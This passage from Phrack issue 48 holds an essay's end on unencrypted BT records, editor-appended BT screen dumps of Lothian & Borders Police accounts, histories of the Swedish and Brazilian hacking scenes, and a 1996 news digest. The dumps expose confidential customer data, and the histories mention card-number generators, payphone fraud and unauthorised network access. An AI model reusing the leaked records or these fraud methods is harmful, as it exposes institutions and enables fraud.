typed in and shouted across the office.  You can forget about any notion
of security, the moment you take that step the whole system is
pointless, you may as well print out all the secret information and sell
it in Dillons - it would certainly make the phone book a best seller!
Better still if the marketer's got what they wanted, put it on CD-ROM
and charge a fortune for it at christmas;

The Multimedia Secrets Collection, 199.95!  

The ideal christmas gift for the spy in your life.  Includes music from
around the world.  BT, it's good to talk!  NB it may be an offence to
talk to anybody about this.

Now you see why BT are keen to quell this espial, they know the
situation, but don't want it publicised, it's very embarrassing for
goodness sake - they have a contract to advise the government on
computer security!  Frankly, I couldn't care less if some BT mandarin
gets a red face, it is no concern of mine.  What is, is the fact that
these secrets are not encrypted and are broadcast around the country on
computers and are available to just about anyone who cares to look at
it.  The only warning displayed was 'Unauthorised access is an offence
under the Computer Misuse Act (1990)' - but this access isn't
unauthorised, is it?  This notion of 'confidential' is a joke.  BT's
computers happily broadcast your ex-directory telephone number (and soon
your name) down the line unless you make the choice to prevent it.  What
is confidential about that?  The public interest is of prime importance
here.  The scandalous intimition in my legal gag is that I am risking
national security?  Me!  Well I have a lot to say about that, it's not
me that allows any old temp to see secrets, and I have never printed a
single telephone number or details of any equipment, unlike some
respected others.  I brought the fact this could be done to light in a
responsible journalistic manner.

If I was such an expert, the intelligence service would have snapped me
up immediately, BT would have paid me off and the government could have
avoided embarrassment.  But I'm not, I'm a journalist.  The Independent
published this story and I have respect for them, they took a risk and
then wanted to distance themselves from me, which I understand.  It was
however a lonely, cold and frightening experience which is not yet over.

The governments of these lands talk big about how the information
superhighway will change all our lives, and how committed they are to
servicing this new form of infrastructure leading to a new, fresh and
exciting dimension - but they also punish, abuse, prosecute, imprison
and destroy the lives of the people who may be far better able to
exploit their ignorance and expose the sensitive underbelly of their
power - their information.  If you ask me, the old guys will make
CyberSpace just as ugly and corrupt as the society they have already
spawned, nurtured and set on a path of destruction out here.  I for one
don't want or need their advice, support or money - let them lay in the
bed they have made, I'll stay in CyberSpace.


                     - Related Info Appended by the Editor -

                           DCS    DISPLAY CUSTOMER SUMMARY       ??/??/?? 11:41

Name   : THE CHIEF CONSTABLE                 Telephone No : 031-315 2007   NQR
                                             Account No   : 8077 0366
Address: LOTHIAN & BORDERS POLICE            Customer Type: BUSINESS VOLUME
         POLICE HEADQUARTERS                 Installations:  1
         5 FETTES AVE
         EDINBURGH                           LINE DETAILS
         EH4  1RB                            Installed    : 26/08/88
                                             Line Status  : B/W
                                             Curr State   :
                                             Inst Class'n : BUS SINGLE EXCL
                    ORDER                    Exchange Type: TXDX03
                    Contr Signed :           BILLING
REPAIR              CONSENT                  Method of Pay: ORDINARY ACCOUNT
             : NO   Systems Bus  : C         A/C U/Enquiry: NO
Servicecare  : NO   Sup Serv Bus : D         D/M Case     : NO
O/S fault    : NO                            Cust Options : STANDARD VRUF
Hist fault   : NO                            OSC Ind      : NO
Hazard       :                               CUSTOMER CONTACTS
Warning      :                               Issue        : NO     Notes : YES

4A_                                                       O-O
                           DCRD   PRODUCT TARIFF DETAILS         ??/??/?? 11:41

 Exchange Name : DEAN                              Tel No : 031-315 2007  NQR
 Installed     : 26/08/88                          a/c No : 8077 0366
 Inst Class'n  : BUS SINGLE EXCL     Notes : YES   S/S No :


    1  A14499  C  EXCH LINE + LINEBOX                       32.66         32.66
    1  A10117  C  BASIC DIAL PHONE                           4.70          4.70
    1  A12481  C  PRIVACY SET NO 8                          51.75         51.75

                                             TARIFF GRAND TOTAL :         89.11
4A_                                                       O-O
                           DIN    DISPLAY NOTE DETAILS           ??/??/?? 11:41

 Installation : THE CHIEF CONSTABLE            Tel no :  031-315 2007     NQR

             WRITTEN    <         AUTHOR           >    EXPIRES

              8/ 2/94   JOSEPHINE/8813                  8/ 2/95

             A/.D LTR SENT FOR 0506843235,0313322106
             0506881101 AND 0313152007
                           DCS    DISPLAY CUSTOMER SUMMARY       ??/??/?? 11:43

Name   : LOTHIAN & BORDERS POLICE            Telephone No : 031-332 2106   NQR
                                             Account No   : 8076 9640
Address: POLICE HEADQUARTERS                 Customer Type: PAYPHONE BUS
         5 FETTES AVE                        Installations:  1
         EH4  1RB                            LINE DETAILS
                                             Installed    : 04/10/83
                                             Line Status  : B/W
                                             Curr State   :
                                             Inst Class'n : BUS PAYPHONE
                    ORDER                    Exchange Type: TXDX03
 BMC/C/N/ / /       Contr Signed : YES       BILLING
REPAIR              CONSENT                  Method of Pay: ORDINARY ACCOUNT
             : **   Systems Bus  : D         A/C U/Enquiry: NO
Servicecare  : S    Sup Serv Bus : C         D/M Case     : NO
O/S fault    : NO                            Cust Options : SINGLE LINE OPTION
Hist fault   : NO                            OSC Ind      : NO
Hazard       :                               CUSTOMER CONTACTS
Warning      :                               Issue        : COM    Notes : YES

4A_                                                       O-O
                           DCRD   PRODUCT TARIFF DETAILS         ??/??/?? 11:43

 Exchange Name : DEAN                              Tel No : 031-332 2106  NQR
 Installed     : 04/10/83                          a/c No : 8076 9640
 Inst Class'n  : BUS PAYPHONE        Notes : YES   S/S No :


    1  A17867  C  PAYP LINE SKTD SGL LINE TG10              32.66         32.66
    1  A19493  C  OPTION 50 NON-ISDN SITE LINE               0.00          0.00
    1  A11790  C  INTERNAL EXTN OFF MASTER SCKT              0.00          0.00
    1  A17817  O  MINSTREL PLUS PHONE                    Outright    sale
    1  A11810  C  METER PULSE FACILITY                       6.70          6.70
    1  A19398  C  PAYPHONE 190MP TABLE-TOP MODEL         Outright    sale
    1             Standard Care charge on A19398            12.00         12.00
                                             TARIFF GRAND TOTAL :         51.36
4A_                                                       O-O
                           DIN    DISPLAY NOTE DETAILS           ??/??/?? 11:43

 Installation : LOTHIAN & BORDERS POLICE       Tel no :  031-332 2106     NQR

             WRITTEN    <         AUTHOR           >    EXPIRES

              8/ 2/94   JOSEPHINE/8813                  8/ 2/95

             A/.D LTR SENT FOR 0506843235,0313322106
             0506881101 AND 0313152007


                              ==Phrack Magazine==

                 Volume Seven, Issue Forty-Eight, File 17 of 18


                             International Scenes

There was once a time when hackers were basically isolated.  It was
almost unheard of to run into hackers from countries other than the
United States.  Then in the mid 1980's thanks largely to the existence
of chat systems accessible through X.25 networks like Altger, tchh and
QSD, hackers world-wide began to run into each other. They began to
talk, trade information, and learn from each other. Separate and diverse
subcultures began to merge into one collective scene and has brought us
the hacking subculture we know today.  A subculture that knows no
borders, one whose denizens share the common goal of liberating
information from its corporate shackles.

With the incredible proliferation of the Internet around the globe, this
group is growing by leaps and bounds.  With this in mind, we want to
help further unite the communities in various countries by shedding
light onto the hacking scenes that exist there.  If you want to
contribute a file about the hacking scene in your country, please send
it to us at

This issue we have files about the scenes in Sweden and Brazil.


The Swedish Hacker Scene

It's about time to fill up this hole in the worldwide history of hackers
published in the Phrack series of articles on national scenes. Since no
one else seems to be getting around to do it I'd better do it myself.

Sweden was in fact one of the countries in the front line during the
birth of computers in the 1940's and 50's. By 1953 KTH university in
Stockholm built BESK, at the time being the fastest and most advanced
computer in the world. During the late 1960's Linkoping university
specialized in computer science and in 1973 the computer society Lysator
started out as an offshoot of american hacker culture of the kind you
could find at MIT during the 60's and 70's. They are still active and
often referred to as the first Swedish hacker society ever, which is
indeed true. Now days they still adhere to the international hacker
ethic of university societies and among their lines are as well idiots
as real bright guys (as is the case of most such societies) and their
contributions to the world of e-culture include Project Runeberg; a text
archive of Scandinavian literature, and a voluminous FTP archive.
There's actually a lot of ASCII work being done at Lysator, including
converting Phrack back issues to HTML format.

Despite the early interest in computers in Sweden there was no
equivalent to the American phreakers of the 1970's. This was not caused
by lack of knowledge but rather by dullness. Sweden was during the 70's
and early 80's in a period of both economic wealth and social mentality
commonly known as "The Welfare State". Everybody was facing the same
high economic standards, nobody was really displeased with Swedish
society, and the government granted lots of spare-time activities for
youths. Thus the growing ground for any outlaw societies was withdrawn.
(Eg Hells Angels didn't start out in Sweden until the 80's.) Swedes were
in fact too pleased, too wealthy and too filled up with their vision of
an almost utopian society to even get the faintest glimpse of an idea to
form any underground movements. Even political groupings like
Anarchists, Hippies (in Europe referred to as "Provos") or Fascists were
almost WIPED OUT by the extreme political climate and wealth of the

Thus, phreaker culture couldn't possibly start out in Sweden at this
time, though some freaked out engineers and radio-amateurs might have
built blue boxes and similar equipment for their household needs. This
state of society caused Sweden to lag behind other European and
Scandinavian countries in the field of outlaw hacking.

The first hacker activity in Sweden was reported by the authorities in
1980. The hacker in question was a student at Chalmers university in
Gothenburg and was sued for manipulating the account system into
granting him free access to the mainframe, for which was sentenced to a
relatively light fine. Apart from some similar incidents carried out by
bright individuals there was no real H/P scene until 1984. Also in 1980
BBS activity started out in Sweden. Most enthusiasts were using a
Swedish micro built by Luxor and DIAB in 1978 called ABC-80 (Obviously
inspired by the American TRS-80). These enthusiast, however, were well
organized engineers running a straight user-group, no anarchists or
radicals of any kind were ever involved.

In 1984 a magazine called "Rolig Teknik" started out as an offshoot of
YIPL/TAP featuring the same kind of material, and by 1987 some
journalist "discovered" this magazine, causing a lot of noise throughout
The Welfare State and bringing people out in a public debate of how to
defeat this magazine. (Though it actually didn't feature any illegal
material; even Sweden has the freedom of speech and press written
explicit in its constitution, as in the American First Amendment.)
"Rolig Teknik" rapidly became a cult media for underground electronic
freaks, outlaw radio amateurs, and other antisocial movements. But let's
not get ahead of events.

By early 1984 two youths aged 17 and 19, clearly inspired by the movie
"War Games", hacked their way into several Swedish computer systems
using a simple Apple II and a 300 baud modem, notably DAFA-Spar - a
register containing public information on every Swedish citizen. Though
there were no secret data in this computer, and though these hackers
never succeed in gaining root access, the incident was annoying to the
authorities. Also this year, some wealthy upper-middle class youths
started using the was-to-become major European home computer: the
Commodore 64. What the Apple II was for America, the C-64 was for
Europe. Enter the software crackers.

C-64 was THE symbol of hackerdom to Swedish youths in the 1980's. As
software cracker Mr.Z pioneered the hacker scene in 1983 with hundreds
and hundreds of cracked games, Swedish hackers somehow got to believe
that cracking games was the Big Thing for any hacker. Besides, not many
of these guys had modems. By 1987 American game producers were alarmed
by the Niagara of cracked C-64 software being downloaded from Europe,
causing them to start copy-protecting games that were to be exported to
Europe. A closer examination showed that a lot of these cracks were made
by Swedish groups, notably Triad and Fairlight. Thus, most Americans to
get in touch with the Swedish hacker scene were what you would refer to
as the "Warez D00ds" or "Pirates" of the time. Since the Swedes were
unable to phreak due to lack of knowledge in the telecom field, American
warez d00ds constantly called up Swedish crackers to obtain the latest

There seems to be some kind of misconception in the American view of the
hacker culture of Europe: Not very many hackers in Sweden and the rest
of Europe got into phreaking nor net hacking in these early years,
perhaps with the exception of the movement in Germany caused by Chaos
Computer Club. By tradition most European hackers in general, and
Swedish hackers in particular, turned to software cracking and demo
programming. (The Demo as an art form was invented in Europe during
1984-86.) None of these activities were actually illegal at the time
being, though indeed underground. This might have helped to create the
general American view of European hackers as "Idiotic Immature Warez
D00ds". In fact, most European hackers look upon software cracking and
demo programming with pride, though spreading (warez trading) wasn't
considered a real hacker activity, and pirating for economic gain was
looked upon with disgust and utter contempt. Software spreading in all
forms was finally outlawed in Sweden January 1st 1993.

1986: Enter the Netrunners.
By the year 1986 the legendary BBS "Tungelstamonitorn" under the
supervision of Jinge Flucht began distributing H/P and Anarchy files.
Jinge himself, being a social inspector and thereby fully aware of the
state of society, was upset with The Welfare State and thought the
Swedes had gone law-abiding in an absurd and unhealthy manner. In his
view people seemed to accept laws without ever questioning them, thereby
making Sweden into a conformistic utopian hell. Later Jinge joined the
Fidonet where he got known for running the most explicit and intense
debates in Swedish BBS-culture ever.

Probably the H/P files stored at Jinges BBS were the spark that lit the
Swedish net hacking scene. Swedish hackers had SEEN "War Games", HEARD
about the CCC in Germany, and now they finally got their hands on
documents that explained the techniques. In 1987 excerpts from Steven
Levy's "Hackers" and Bill Leebs "Out of the Inner Circle" were reprinted
in the Swedish computer- magazine "Datormagazin" by editor Christer
Rindeblad, creating a common group-awareness among Swedish hackers.
("Out of the Inner Circle" had actually been translated to Swedish
already 1985, but was obviously read mostly by security experts and War
Games-obsessed wannabe's.) 1987 also saw the birth of the first
all-Swedish hacker group ever to make themselves a name outside
Scandinavia. This was of course SHA - Swedish Hackers Association.

SHA wanted to be a hacker group of international standards and
qualities. They collected the best people, storing up a knowledge basis
for future use. In the years 1989-92 SHA was at its height, successfully
trashing computer companies and computer scrap dumps and gaining access
to hundreds of computers. Inspired by the German hackers Pengo and
Hagbard in Leitstelle 511 they started having regular meetings on
fridays at their own booked table in a restaurant in Stockholm. Their
perhaps biggest achievement ever was made in 1991 when they wrote a
scanner to exploit the Unix NIS-bug, running it on 30 processes
simultaneously, and ending up with some 150.000 passwords whereof 600
gained root access. Though some would say SHA were a bit too fond of the
media image of hackers and sometimes had a weakness for hacker cliches,
no one can really deny their achievements.

Swedish hackers also got a lot attention for their carding activities in
1989. Both Sneaker of SHA and Erik XIV of Agile wrote modulo
10-calculators to produce endless series of valid Visa-numbers. Erik XIV
was even on national television, demonstrating the weaknesses of the
credit card system. Cynically they were both busted.

At Christmas 1990 the Swedish X.25 network Datapak and Decnet were both
attacked by a group of UK hackers called 8LGM (8 Little Green Men or
8-Legged Groove Machine - I don't know which one is a media nick). Using
a war dialer they scanned about 22.000 entries and successfully accessed
380 of these. This is perhaps the most well-known of all hacks in
Sweden, causing a lot of media noise. (The exact figures are a product
of the Swedish telephone system AXE that I will write more about in a
moment.) As reported in Phrack #43 they were busted and convicted under
the new British anti-hacker law.

Later Swedish achievements include the phonecard emulator, constructed
by Atari ST enthusiast Marvin in 1992, after hearing the Swedish phone
company Telia boast of these prepaid phonecards superior security.
Though these silicon-based chip phonecards (256 bytes serial EPROMs)
couldn't actually be recharged or easily tampered with, he realized
there was no problem in emulating the chip with a Motorola 68c705
one-chip computer. Some fake phonecards were manufactured and sold for
almost nothing among his very best friends more on a "See, it can be
done"-basis than with any intention to defraud Telia or earn heaps of
money. Somehow the blueprints for the emulator found its way into the

Swedish hackers in general have a very strong tradition of forming
groups, due to their roots in programming activities rather than
phreaking. Group awareness and culture is very widespread and accepted
within the boundaries of the whole Swedish computer underground. Thus,
LOYALTY is very strong among Swedish hackers. Most hackers who get
busted by authorities or blackmailed by companies would rather DIE than
telling the name of even a single 10-year old warez d00d.

While we're at it - hacker busts, and phreaker busts in particular, are
carried out in quite a disturbing manner in Sweden. To explain this I
must first explain a bit about the Swedish telephone system.

Almost all Swedish networks use a system similar to 4ESS, constructed in
cooperation by the State Telecom "Televerket" and Swedish
telecommunications equipment producers Ericsson Telecom. This system is
called AXE, which is an abbreviation for Automatic Cross-Connection
Equipment. AXE is used in some 100 countries all over the world and
probably one of the most beautiful exchange systems ever developed. AXE
is designed for national, metropolitan and rural networks, and the same
system nucleus is used in all the different systems. It can control both
digital and analog equipment, though it's made with the aim on
transforming all Swedish networks from analog to digital connections. It
also comes with a fully featured bureaucratic organization for
maintenance, administration and economics in general. AXE has the
capability of building virtual groups in switching-stations, thus
putting your PBX into the telco soup as well, making you believe you
have the control over it though it's actually located elsewhere.

In short, this is an centralized, monolithic system of the horribly
efficient type that telcos love. It tells any amateur to keep their
hands off and do something else. Of course it's a system that hackers
and phreakers hate, since it's limited to authorities. The filthy crowd
do not know what is going on inside these exchanges, and the telcos like
to keep it that way.

AXE also works with stored program control that resides inside the
system core of every switching station. Of course this is all software,
and of course State Telecom, upon building AXE, couldn't hold back their
Big Brother tendencies.

The result is that every call made from anywhere to anywhere, is logged
in a central computer. Now that's something! Not only did this equipment
wipe out every possibility to box within Sweden, but it also removed all
kind of phone privacy. In fact not only calls are logged, but ALL
activity performed at your terminal. If you lift the handset, press a
digit and hang up, time, date and the digit you pressed is registered.
All this data is stored on magnetic tapes for 6 months.

Now, luckily Sweden has a strong Computer Privacy Act. You just aren't
allowed to set up and use such facilities as you please, not even if you
are the State Telecom. There is even a specific authority,
"Datainspektionen" (The Computer Inspection Department) with the only
purpose of looking after and preserve citizen privacy by protecting
individuals from corporate and governmental interests. As a result State
Telecom "Televerket" (which later changed name to "Telia" as they were
transformed from an authority into a private corporation as of July 1st
1993) were not allowed to give out any of the information gathered in
these registers to anyone else than either the calling or the receiving
party. Not even the police could have this information in case they
weren't suspecting a indictable crime resulting in at least 2 years of
prison, such as drug trading or terrorism, and you don't get that kind
of penalty for phreaking alone - at least not in Sweden.

But Telia could evade these restrictions. In order to successfully
phreak using PIN-codes, you have to call an operator using a Swedish
version of the 800-number: a 020-number. Telia could then claim the call
was made to the owner of that number: AT&T, MCI & Sprint mostly. (There
are of course Calling Cards in Sweden as well: "Telia Access" - neither
used nor abused by anybody.) As well as these companies have their own
intelligence agencies, so have Telia. Once eg AT&T had someone traced
for phreaking, Telia could easily produce a complete list of calls made
to AT&T operators from a certain number. Telia themselves would even use
information they weren't allowed to: they would pull out a list of ALL
outgoing calls from the phreaker in question including calls to MCI,
girlfriends, mom, dad, grandma... all logged calls.

Telia would then call this poor phreaker to their local Swedish office,
sticking the endless list under his/her nose, commanding: "TALK, or we
will turn you in to the authorities", carefully not to mention that all
information on the printout would be absolutely useless in court. The
only conclusive evidence would in fact be those calls traced back all
the way from America or wherever the phreaker called; in that way
rigorously documented. Naturally, the common phreaker had no legal
experience and wouldn't know about this. Instead he would talk, giving
out detailed information on his/her techniques worthy of a full-time
high-educated security consultant. After this session the phreaker was
given a bill of the calls that could indeed be proven in court. If
he/she didn't pay it - Telia (or any other operator) would end up
turning him/her to the authorities anyway. So much for cooperation.
Telia themselves would, if they felt it was necessary, go even further
than the overseas operators, systematically exposing every weakness in
the phreakers personal life, using the information in the computer log
for psychological terror.

This pattern of treatment of Swedish phreakers seems to be very much the
same among all telecom providers in Sweden. Lately Telia, under command
of security officer Pege Gustavsson made some noteworthy mistakes
though: in their efforts to convict as many phreakers as possible, they
called up companies receiving calls from "suspicious" individuals,
warning them about this or that person calling them over and over again.
This could only mean Telia was also systematically monitoring some
Swedish hackers and had formed some security group to carry out this
probation. Normally this should have been kept quiet, as Telia are
absolutely not allowed to form their own abuse police forces, but at
some instance they happened to call up a security company using
phreakers as informants. Of course this security company didn't like the
idea of having "their" phreakers traced around, and the matter was
brought to public attention. Many independent sources agreed that Telia
had violated the Swedish Computer Act, and hopefully this brought an end
to this wild tracing. You shouldn't be too sure though, since Telia
themselves never confessed of doing anything illegal.

As you might have understood the Computer Act is quite an important
factor in all legal discussions concerning Swedish hacking. This Act
came out as a result of general attention focused upon the computers vs.
privacy matter in 1973. As Sweden was one of the first countries to make
use of computers in governmental administration, and as Swedish
authorities were eager to register every possible piece of information,
some politically influential individuals started a debate resulting in
the founding of the Computer Act and the Computer Inspection Department.
As a result Sweden is light years ahead of most countries when it comes
to privacy matters. For example there is no problem in having the number
identification possibilities on your line deactivated for good, and it
won't cost you anything. You can also easily obtain free printouts from
any computer register containing information on you, including the
register at your local AXE-exchange.

To sum this article up I can draw the conclusion that even Sweden has
had its handful of bright hackers, each category bringing their straw to
the stack. Even though Swedish officials and companies would hardly
admit it, these hackers have obviously been very important for this
country, at least in forcing system managers, security officials,
software producers, policemen, politicians and so on to think things
over. Sweden has also attracted outside attention in some cases, and
will probably keep doing so. If you should pin- point one group that has
meant more to the Swedish scene than any other, it wouldn't be any of
the H/P groups, but rather the cracking pioneers Fairlight - a well
organized and world-famous warez producer.

Linus Walleij aka King Fisher / Triad

(Some handles have been changed to protect retired Swedish hackers from
luser mail.)

Swedish readers may be interested in the fact that I'm currently writing
a lengthy text in Swedish (a book actually) providing a closer look at
Swedish hacking history, which will be released on hypertext and ASCII
sometime later this year. Over and out from Sweden!


                           HACKING IN BRAZIL

Before talking about hacking here, it's good to describe the conditions
of living. Right now, the country is a mix of Belgium and India. It's
possible to find both standards of living without travelling long
distances. The Southern part of the country concentrate most of the
industry, while in the west one can find Amazonia jungle. There are many
Brazils, one could say.

        Beginning with the hacking and phreaking.

Hackers and computers enthusiasts have several different places for
meeting. When this thing started, by the time of that film "Wargames",
the real place  to meet hackers and  make contacts were the computer
shops, game-arcades and "Video-texto" terminals. The computer shops were
a meeting place because many of those "hackers" had no computers of
their own and the shop-owners  would let them play with them as part of
a advertising tool to  encourage people buying it for their kids.

Today that is no longer needed, since prices dropped down and people
make a team already at schools or sometimes just join a BBS (most people
who buy a modem, end up thinking about setting up a BBS). By the way,
most schools are advertising computer training as part of  their
curricula, to charge more, and like everywhere, I guess, people no
longer learn typewriting, but computer-writing, and many brazilian
newspapers dedicate a section on computer knowledge once a week, with
advertising, hints, general info and even lists of BBS's.

A few years ago, the "Video-texto" terminals were also big meeting
places. That was part of  a effort to make popular the use of a
computer linked by modem to  get services like msx-games, info on
weather, check bank account and so on. Just like the Net,  one could do
e-mail, by some fancy tricks and other  things that could be  called
hacking. The difference was that it was made by the state-owned
telephone company and each time the trick was too well know, it was
changed. The only way to keep in touch was keeping in touch with the
people who used the system like hell. It's no different than what it
happens with the computer gurus. The protocol used for that, X-25 is the
same used for the banking money transfers, but don't think it was
possible to do anything more than checking how much money one had and a
few other classified data. People who used that at home (not too many,
since the company didn't think it would be such a hit, and didn't
provide for it) could spend their fathers money discovering funny things
about the system, like messing with other people's phones and so.  One
could also  use the terminals at the Shopping Centers to make phone
calls to their friends without paying. The guy at the other end would be
heard by the small speaker.

Phreaking here in Brazil is something secret. Apart from the trick
described in the section "Letters to read by" at the summer 1994 of the
2600 Magazine, where one would call through locked rotatory telephone,
little is known about phreaking. One thing is that people who enrolled
in Telecommunications Engineering could call Europe and USA with ease,
but they would not tell you how. It must be said that all public phones
have metal cables  around the cables and that the phone machines are
quite tough to break down. I guess it wasn't for beauty.

The phones use some sort of metal coins called fichas, which must be
bought somewhere. The trick is to use a coin with a string, so it would
not be collected. But if the police caught... The police doesn't follow
rules about that. Either they put a fine on the guy for that, or arrest
him for vandalism or anything else they think of at the moment. It is
hassle, anyway. My friend who was doing electrical Engineering told me
that boxing in Brazil was impossible. The system is just not good enough
to be boxed. Another friend of mine told me that in the Northeast part,
where people are a little bit different and more easy-going, the phone
system can be boxed, because some top-brass asked the company to let
that  feature implemented. The Phone company doesn't admit any knowledge
about that.

Internet access is something quite hard to get today. Until a few weeks
ago, the system would not let the creation of a Internet site that was
not part of some research project. So, only Universities and like were
capable of putting people in the Net Universe. In the University of Sco
Paulo, people in the post-graduation courses could get it with ease, but
graduating students would have to show some connection to a research
project. That in theory, because the students found out that one could
use the IBM CDC 4360 to telnet without a Internet account. Also, all the
faculties that had computer rooms full of AT 386 which where linked by
fiber optics to this computer.  Another one did the file transfers
between the accounts and the computer at the computer rooms  and that
ftp was also possible without an account, but only to a few sites, like
oakland and so. That lasted for about a year, until that thing was
fixed in the router, but only at the Politechnik School. Says the legend
that the guys were downloading too much GIF and JPG pictures of Top
Models from a ftp site nearby. That spent so much bandwidth that the
site started to complain and both things happened: the site stopped to
store GIF's of wonderful women in swimsuit and the router was fixed to
prevent ftp without a Internet account. One can still today connect the
outside world via telnet and many people have accounts in Internet BBS
like Isca BBS, Cleveland Freenet and like. The Bad Boy BBS was "in",
until  it went out of business. This kind of access is not good, though,
for it is very slow, sometimes. Also, it is hard to  download something
bigger than 60 kbyte.  The way I devised, downloading the file inside
the bbs and uuencoding it. This way you could list the file and capture
the screen listing, uudecode it after some editing and have a working
.exe or .zip file.

By these means one could, inside the Campus, do all downloading one
wanted,  from anywhere in the world. Outside the campus, it is  possible
to do it by phone lines, but: the Modem will not go faster than 2400
without character correction  (no Zmodem at all). Which makes quite hard
to download compressed files. One could  an account:  that  would be
possible by these means, but the amount of trash during the phone
connection would make it real hard to type in passwords and like. To try
doing any kind of  thin g but reading letters by modem is some kind of
torture. The real thing is to do it by "linha dedicada", a special line
for computer transmission. It's much more expensive though, but if you
have the money to spend with that...

Perhaps the best way to get access to an Internet account though is to
be part of the research project "Escola do Futuro" that among other
things get schools linked by the Net. That's what I did and they pay me
quite well to search for data in the Net, for  the students of those
schools. The University of Campinas is said to give all students a
Internet account regardless of knowledge of what-it-is, as soon as the
guy(girl) gets in. Of course here there's BITNET also. That's doomed for
extinction, but this or  that reason keeps people from closing it down.
Most teachers use it, guess there's even some post-graduation work
written about that. It's easier to access via modem, also. Old habits
die hard.

Outside the Campus, for common people, there are few opportunities. The
only thing you can get, at least until the opening of commercial
internet sites, something about to happen one of these days, is access
by mail. You join one BBS with Internet access, and your mail is sent by
a Internet account later during the  day. This is not a direct access,
as one can see,  but it's a easy way to access by modem. Problem is that
you have to pay if you use it too much. The BBS's that do it don't do it
for free, also. Connection to the Compuserve is also possible, but it
also costs a lot of money, for my point of view.

Because of the newspapers, the knowledge about Internet is spreading
fast and the number of sites is growing the same way everywhere else in
the world. Even the military people are starting with it. There are plan
s to enhance it and make better connections, and some informative
material is being translated in Portuguese, like "Zen and the Art of
Internet" and made available in the There are many
mirrors from many famous sites, like Simtel20 and at least one Internet
BBS, the "Jacare BBS" (Alligator bbs, available by telnetting - - login bbs. World Wide Web sites are
becoming sort of popular also, but still available only to a few people
who are lucky enough to get the access. Brazilian hackers are not very
fond  of sharing the knowledge of how to get access and other things,
sometimes because of fear of losing it, sometimes because the greed of
it would overcharge the system. There's no hacker magazine here, yet,
and very few people confess their curiosity about hacking for knowledge
for fear of not finding jobs. Anyway most would-be hackers either get a
job and stop hacking for fun or keep their activities secret in order to
pursue their objectives.

Today, Brazilian Hacker Underground did change a little. Lots of
magazines, dealing only with Internet Issues, are being published. There
is a hacker zine, the now famous "Barata Eletrica". This and the hacker
list I created is starting to unite the computer rats, here. But I had
to stop hacking in order to write the e-zine. Too famous to do that.
Another guy just started the thing. He did not learn with my mistake and
is signing it with his name, also. Received lots of letters, even as far
as Mozambique, praising the material, which is very soft, for fear of
losing my net access. Twice my account was "freezed". The people at my
site are paranoid. Suffered too much from break-ins already. Most BBS's
are trying to turn themselves in Internet providers or else, to get
e-mail access. There was a fear the State would control the thing, like
they did with the Phone system. Can any of you guys imagine what it is,
to pay 4.000 US$ dollars for a phone line? In the City of Sao Paulo,
(look like L.A., one can say), that's the average price. Cellular is
cheaper. Motorola rules. The public phone system was changed again. No
more "fichas". At least for long distance calls. It's a small card that
looks like plastic one side and magnetic material in the other. m still
trying to do 2600 meetings. Oh, once in a while, there is a break-in
here and there, and a hacker is interviewed in TV, but people are only
now making the difference between the good guys (hackers) and the  bad
guys (crackers). With Win95, people are losing fear of exchanging
virus-sources files. The lack of philes in Portuguese makes it dificult
for people to learn about hacking. People who know about it, don't have
enough time to write. I started to unite some guys to do a translation
of "hacker crackdown", but that's another story. I shortened the name of
the book to "crack.gz". Guess what's happened? My account is blocked up
to this day. They told me I'll get my access back. One of these days.
One of these days I'll re-write this article, and tell the whole thing
in detail.

Any Portuguese speaker that does not know about my e-zine,
try a mirror. The URL:


                              ==Phrack Magazine==

                 Volume Seven, Issue Forty-Eight, File 18 of 18

              PWN                                             PWN
              PWN              Phrack World News              PWN
              PWN                                             PWN
              PWN        Compiled by Datastream Cowboy        PWN
              PWN                                             PWN

Security Software Thwarts Hackers                               July 23, 1996

World Star Holdings, Ltd. announced today that there have been approximately
5,000 unsuccessful attempts to break its proprietary VPAGE Internet security
system.  In order to further demonstrate the functionality of its technology,
they Company has unveiled a new addition to the World Star Internet security
challenge:  "The World Star Cyberhospital."

The company recently launched an online contest offering more than $50,000 in
cash and prizes to the first person to break its security.

  something other than the fake, non-production demo contest system.  How
  well does their software hold up in a real business environment?
  (in other words:  THEIRS!?!!@$)

     World Star Holdings (NET-WORLDSTAR-MB-CA)
     165 Garry Street
     Winnipeg, Manitoba R3C 1G7

     Netname: WORLDSTAR-MB-CA
     Netnumber: ]


Your Cellular Phone Number May Be Up For Grabs                August 21, 1996
by Mimi Whitefield (Miami Herald)

Electronic bandits have snatched cellular phone numbers from the airwaves and
cloned phones used by the Miami office of the Secret Service.

BellSouth Florida president Joe Lacher's phone has been cloned; Spero Canton,
spokesman for BellSouth, has been a victim three times over.

"The bums never sleep.  They're everywhere," complained Bill Oberlink,
regional president for AT&T Wireless Services.

But the good news is that law enforcement agencies and cellular companies
themselves are fighting back with a new arsenal of tools, technology and laws
that make it easier to detect and prosecute cellular bandits.


Miami Fraud Squad Pursues Cellular Bandits                    August 12, 1996
by Audra D.S. Burch (Miami Herald)

How's this for capitalism gone awry:  Metro-Dade police nabbed a cellular
bandit who was selling a $150 package deal -- $75 each for a stolen phone
and number -- along with a 30-day guarantee on unlimited illegal air time.
In a sting operation, police took him on the cut-rate offer.

Thanks to the work of a special Metro-Dade Police Economic Crimes Bureau, the
entrepreneurial cloner got a prison sentence.


Newer Technology Aids Fight Against Cellular Fraud            August 21, 1996
by Mimi Whitefield (Miami Herald)

New technology is on the side of cellular companies fighting telecom criminals
who can rack up thousands of dollars in illegal charges before a consumer even
knows he's been hit.

New Jersey-based Bellcore, for example, has developed NetMavin software,
which can detect fraudulent or unusual calling patterns within half an hour.

"This is really going to screw the cloners up," said Roseanna DeMaria, an
AT&T Wireless executive.


SPA Files Copyright Suit                                        July 28, 1996
(Reuters News)

The Software Publishers Association said Sunday it filed a civil copyright
infringement lawsuit against a Seattle man for illegal distribution of
software on the Internet.

The suit, which was filed July 23 in the U.S. District Court in Seattle,
alleges that Max Butler illegally uploaded copyrighted software to a file
transfer protocol site for distribution across the Internet, the trade
association said.

"This action is a warning to Internet users who believe they can infringe
software copyrights without fear of exposure or penalty," said Sandra
Sellers, Software Publisher's vice president of intellectual property
education and enforcement.


The L0pht                                                        August, 1996
by Steve G. Steinberg (Wired) p. 40

What do a group of hackers do when the equipment they've accumulated over
years of dumpster diving no longer fits in their apartments?  They get
a l0pht.  Since 1993, a core group of seven Boston-based hackers have rented
a loft space for hacking, trading information about cellular phones security,
and building things like a wireless Internet service using discarded
microwave equipment.

Now that all of them have day jobs in the industry, why do they keep at it?
"For the girls and the text files, of course," says Mudge.

